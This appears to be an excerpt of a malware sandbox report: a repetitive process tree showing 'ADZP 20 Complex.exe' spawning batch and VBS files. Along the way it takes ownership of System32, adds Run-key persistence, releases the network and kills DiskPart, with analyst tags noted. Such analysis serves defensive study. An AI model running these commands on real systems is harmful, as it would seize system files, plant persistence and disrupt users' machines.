        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:4288
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:4540
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:4724
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:5104
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6580
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:4616
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:5172
        
        C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:5400
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im DiskPart /f
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5512
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:9344
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:9260
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:9948
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:2612
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:10796
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:10568
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:11936
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:12964
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:15124
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:14480
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:16720
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:17320
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        7⤵
        
        PID:14832
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:16236
        
        C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:17484
        
        C:\Windows\SysWOW64\mspaint.exe
        
        mspaint.exe
        7⤵
        
        PID:17592
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:17804
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        7⤵
        
        PID:17872
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:18056
        
        C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:18256
    - - C:\Windows\SysWOW64\notepad.exe
        
        notepad
        5⤵
        
        PID:4020
    - - C:\Windows\SysWOW64\calc.exe
        
        calc
        5⤵
        
        PID:4080
    - - C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:4092
    - - C:\Windows\SysWOW64\mspaint.exe
        
        mspaint.exe
        5⤵
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:2500
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        Executes dropped EXE
        
        PID:3088
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5283.tmp\5284.tmp\5285.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        Drops autorun.inf file
        Drops file in System32 directory
        
        PID:3124
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:4776
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:4328
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:4772
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:5180
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6608
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:5236
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:5420
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:5520
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5588
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:9944
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:5552
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:5256
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:10992
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:12000
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:13088
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:14100
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:14952
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:16264
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:15404
    - - C:\Windows\SysWOW64\notepad.exe
        
        notepad
        5⤵
        
        PID:3096
    - - C:\Windows\SysWOW64\calc.exe
        
        calc
        5⤵
        
        PID:3132
    - - C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:3140
    - - C:\Windows\SysWOW64\mspaint.exe
        
        mspaint.exe
        5⤵
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:3100
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:3664
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:3584
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:3304
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:4132
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:4532
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:4904
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:7500
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\824A.tmp\825A.tmp\825B.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:12812
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:13028
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:12412
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:14928
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:15260
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:14420
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:15940
        
        C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:1148
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im DiskPart /f
        7⤵
        Kills process with taskkill
        
        PID:8436
    - - C:\Windows\SysWOW64\notepad.exe
        
        notepad
        5⤵
        
        PID:7536
    - - C:\Windows\SysWOW64\calc.exe
        
        calc
        5⤵
        
        PID:7564
    - - C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:7604
    - - C:\Windows\SysWOW64\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:7620
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:7644
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8871.tmp\8872.tmp\8873.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:13144
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:12420
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:15000
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:14660
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:15060
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:15868
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:1148
    - - C:\Windows\SysWOW64\notepad.exe
        
        notepad
        5⤵
        
        PID:7664
    - - C:\Windows\SysWOW64\calc.exe
        
        calc
        5⤵
        
        PID:7696
    - - C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:7716
    - - C:\Windows\SysWOW64\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:7748
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:7772
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AA43.tmp\AA44.tmp\AA45.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:13660
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:12440
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:13460
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:16180
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:15700
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:15528
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:16944
        
        C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:9728
    - - C:\Windows\SysWOW64\notepad.exe
        
        notepad
        5⤵
        
        PID:7804
    - - C:\Windows\SysWOW64\calc.exe
        
        calc
        5⤵
        
        PID:7832
    - - C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:7848
    - - C:\Windows\SysWOW64\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:7864
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:7884
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B396.tmp\B397.tmp\B398.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:14192
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:7304
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:13308
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:15728
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:15656
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:16360
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:16848
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:16464
    - - C:\Windows\SysWOW64\notepad.exe
        
        notepad
        5⤵
        
        PID:7900
    - - C:\Windows\SysWOW64\calc.exe
        
        calc
        5⤵
        
        PID:7924
    - - C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:7944
    - - C:\Windows\SysWOW64\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:7972
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:7992
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A42B.tmp\A42C.tmp\A42D.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:6444
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:13740
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:14320
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:16296
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:15972
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:16052
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:16572
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:16888
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        7⤵
        Kills process with taskkill
        
        PID:16820
    - - C:\Windows\SysWOW64\notepad.exe
        
        notepad
        5⤵
        
        PID:8032
    - - C:\Windows\SysWOW64\calc.exe
        
        calc
        5⤵
        
        PID:8056
    - - C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:8072
    - - C:\Windows\SysWOW64\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:8104
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:8124
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AF71.tmp\AF72.tmp\AF73.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:13800
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:14052
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:16312
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:15596
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:14948
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:16780
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:16692
    - - C:\Windows\SysWOW64\notepad.exe
        
        notepad
        5⤵
        
        PID:8176
    - - C:\Windows\SysWOW64\calc.exe
        
        calc
        5⤵
        
        PID:1808
    - - C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:7348
    - - C:\Windows\SysWOW64\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:7488
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:8324
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\EF5E.tmp\EF5F.tmp\EF60.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:15104
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:15376
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:17028
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:13924
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:17124
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:11880
    - - C:\Windows\SysWOW64\notepad.exe
        
        notepad
        5⤵
        
        PID:8332
    - - C:\Windows\SysWOW64\calc.exe
        
        calc
        5⤵
        
        PID:8356
    - - C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:8368
    - - C:\Windows\SysWOW64\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:8412
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:8448
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E3E9.tmp\E3EA.tmp\E3EB.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:15140
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:13372
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:14912
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:17016
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:17300
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:16508
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:6264
    - - C:\Windows\SysWOW64\notepad.exe
        
        notepad
        5⤵
        
        PID:8476
    - - C:\Windows\SysWOW64\calc.exe
        
        calc
        5⤵
        
        PID:8508
    - - C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:8532
    - - C:\Windows\SysWOW64\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:8568
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:8600
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\F47C.tmp\F47D.tmp\F47E.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:14436
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:15764
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:15932
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:14728
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:9788
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:16424
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:14808
    - - C:\Windows\SysWOW64\notepad.exe
        
        notepad
        5⤵
        
        PID:8636
    - - C:\Windows\SysWOW64\calc.exe
        
        calc
        5⤵
        
        PID:8676
    - - C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:8704
    - - C:\Windows\SysWOW64\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:8728
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:8756
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1362.tmp\1372.tmp\1373.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:16004
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:16000
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:15708
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:13064
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:16416
    - - C:\Windows\SysWOW64\notepad.exe
        
        notepad
        5⤵
        
        PID:8792
    - - C:\Windows\SysWOW64\calc.exe
        
        calc
        5⤵
        
        PID:8820
    - - C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:8848
    - - C:\Windows\SysWOW64\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:8868
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:8912
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6A5.tmp\6A6.tmp\6A7.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:10684
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:15624
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:15740
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:17184
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:16780
        
        C:\Windows\SysWOW64\reg.exe
        
